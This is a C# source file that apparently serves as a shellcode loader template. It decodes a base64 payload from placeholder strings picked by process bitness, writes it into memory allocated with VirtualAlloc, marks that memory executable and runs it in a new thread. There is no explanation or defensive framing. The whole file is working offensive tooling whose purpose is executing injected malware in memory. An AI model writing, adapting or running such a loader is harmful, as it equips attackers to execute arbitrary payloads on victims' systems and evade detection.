using System; using System.Reflection; using System.Diagnostics; using System.Configuration.Install; using System.Runtime.InteropServices; using System.Threading; class Program { [Flags()] public enum AllocationType : uint { COMMIT = 0x1000, RESERVE = 0x2000, RESET = 0x80000, LARGE_PAGES = 0x20000000, PHYSICAL = 0x400000, TOP_DOWN = 0x100000, WRITE_WATCH = 0x200000 } public enum Protection { PAGE_NOACCESS = 0x01, PAGE_READONLY = 0x02, PAGE_READWRITE = 0x04, PAGE_WRITECOPY = 0x08, PAGE_EXECUTE = 0x10, PAGE_EXECUTE_READ = 0x20, PAGE_EXECUTE_READWRITE = 0x40, PAGE_EXECUTE_WRITECOPY = 0x80, PAGE_GUARD = 0x100, PAGE_NOCACHE = 0x200, PAGE_WRITECOMBINE = 0x400 } [DllImport("kernel32.dll", SetLastError=true)] static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect); [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] static extern IntPtr CreateThread( IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId); [DllImport("kernel32.dll", SetLastError = true)] static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect); static void Main(string[] args) { byte[] shell = null; string safdsv64 = "#REPLACEME64#"; string safdsv32 = "#REPLACEME32#"; if (IntPtr.Size == 4) { // 32-bit sc shell = Convert.FromBase64String(safdsv32); } else if (IntPtr.Size == 8) { // 64-bit sc shell = Convert.FromBase64String(safdsv64); } IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE); if( mem != IntPtr.Zero ) { uint oldProt = 0; uint threadId = 0; Marshal.Copy(shell, 0, mem, shell.Length); VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt); CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId); WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset); wh.WaitOne(); } } }